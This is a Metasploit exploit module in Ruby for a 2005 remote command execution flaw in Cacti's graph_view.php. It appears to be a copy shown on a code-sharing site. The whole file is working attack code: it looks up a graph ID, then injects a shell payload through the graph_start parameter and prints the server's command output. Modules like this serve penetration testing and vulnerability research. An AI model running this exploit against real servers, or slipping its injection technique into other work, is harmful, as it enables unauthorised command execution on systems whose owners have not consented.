Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::HttpClient
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Cacti graph_view.php Remote Command Execution',
15
      'Description'    => %q{
16
          This module exploits an arbitrary command execution vulnerability in the
17
        Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to
18
        0.8.6-d are vulnerable.
19
      },
20
      'Author'         => [ 'David Maciejak <david.maciejak[at]kyxar.fr>', 'hdm' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'OSVDB', '17539' ],
25
          [ 'BID', '14042' ],
26
        ],
27
      'Privileged'     => false,
28
      'Payload'        =>
29
        {
30
          'DisableNops' => true,
31
          'Space'       => 512,
32
          'Compat'      =>
33
            {
34
              'PayloadType' => 'cmd',
35
              'RequiredCmd' => 'generic perl ruby python telnet',
36
            }
37
        },
38
      'Platform'       => 'unix',
39
      'Arch'           => ARCH_CMD,
40
      'Targets'        => [[ 'Automatic', { }]],
41
      'DisclosureDate' => '2005-01-15',
42
      'DefaultTarget' => 0))
43

44
    register_options(
45
      [
46
        OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
47
      ])
48
  end
49

50
  def exploit
51
    # Obtain a valid image ID
52
    res = send_request_cgi({
53
      'uri'      => normalize_uri(datastore['URI']),
54
      'vars_get' =>
55
        {
56
          'action' => 'list'
57
        }
58
      }, 10)
59

60
    if (not res)
61
      print_error("The server gave no response")
62
      return
63
    end
64

65
    m = res.body.match(/local_graph_id=(.*?)&/)
66
    if (not m)
67
      print_error("Could not locate a valid image ID")
68
      return
69
    end
70

71
    # Trigger the command execution bug
72
    res = send_request_cgi({
73
      'uri'      => normalize_uri(datastore['URI']),
74
      'vars_get' =>
75
        {
76
          'local_graph_id' => m[1],
77
          'graph_start'    => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
78
        }
79
      }, 25)
80

81
    if (res)
82
      print_status("The server returned: #{res.code} #{res.message}")
83
      print("")
84

85
      m = res.body.match(/YYY(.*)YYY/)
86

87
      if (m)
88
        print_status("Command output from the server:")
89
        print(m[1])
90
      else
91
        print_status("This server may not be vulnerable")
92
      end
93

94
    else
95
      print_status("No response from the server")
96
    end
97
  end
98
end
99

100